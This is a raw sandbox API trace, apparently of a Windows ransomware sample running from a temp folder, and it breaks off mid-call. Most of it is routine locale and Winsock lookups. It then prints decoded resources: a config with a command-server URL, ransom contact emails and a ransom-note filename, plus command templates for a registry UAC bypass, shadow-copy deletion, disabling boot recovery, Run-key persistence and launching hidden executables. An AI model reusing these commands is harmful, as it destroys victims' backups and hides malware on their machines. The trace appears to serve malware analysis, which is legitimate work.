GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") 
returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0116.455] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 
[0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0116.456] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0116.456] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0116.456] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0116.458] 
GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0116.458] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0116.459] GetProcAddress 
(hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0116.459] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0116.459] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0116.465] GetACP () returned 0x4e4 [0116.465] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0116.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x30 [0116.465] GetTickCount () returned 0x279ff [0116.465] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=17325425520) returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x51\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x50\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x79\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 
[0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4b\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x69\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6e\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x48\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x53\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x35\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, 
lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x47\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x70\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x39\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x49\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0116.465] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0116.466] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0116.466] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0116.466] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0116.466] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0116.466] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0116.466] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0116.466] 
LockResource (hResData=0x50d55c) returned 0x50d55c [0116.466] FreeResource (hResData=0x50d55c) returned 0 [0116.466] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.466] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.466] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.466] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.466] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.466] FreeResource (hResData=0x50d64c) returned 0 [0116.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.466] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0116.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, 
lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.466] GetCurrentThreadId () returned 0xdf8 [0116.467] GetCurrentThreadId () returned 0xdf8 [0116.467] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0116.467] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0116.467] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0116.467] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0116.468] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0116.469] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0116.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0116.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0116.471] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, 
fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0116.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0116.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0116.473] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0116.474] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0116.475] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0116.475] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0116.475] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0116.475] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0116.475] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0116.475] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0116.475] LockResource (hResData=0x50d72c) returned 0x50d72c [0116.475] FreeResource (hResData=0x50d72c) returned 0 [0116.475] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.475] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.475] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.475] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.475] MultiByteToWideChar (in: 
CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.475] FreeResource (hResData=0x50d64c) returned 0 [0116.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.475] GetCurrentThreadId () returned 0xdf8 [0116.475] GetCurrentThreadId () returned 0xdf8 [0116.475] GetCurrentThreadId () returned 0xdf8 [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy 
ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0116.476] GetCurrentThreadId () returned 0xdf8 [0116.476] GetCurrentThreadId () returned 0xdf8 [0116.476] GetCurrentThreadId () returned 0xdf8 [0116.476] GetCurrentThread () returned 0xfffffffe [0116.476] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0116.476] GetLastError () returned 0x3f0 [0116.476] GetCurrentProcess () returned 0xffffffff [0116.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0116.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0116.476] CloseHandle (hObject=0xb8) returned 1 [0116.476] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, 
nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0116.476] EqualSid (pSid1=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0116.476] EqualSid (pSid1=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, 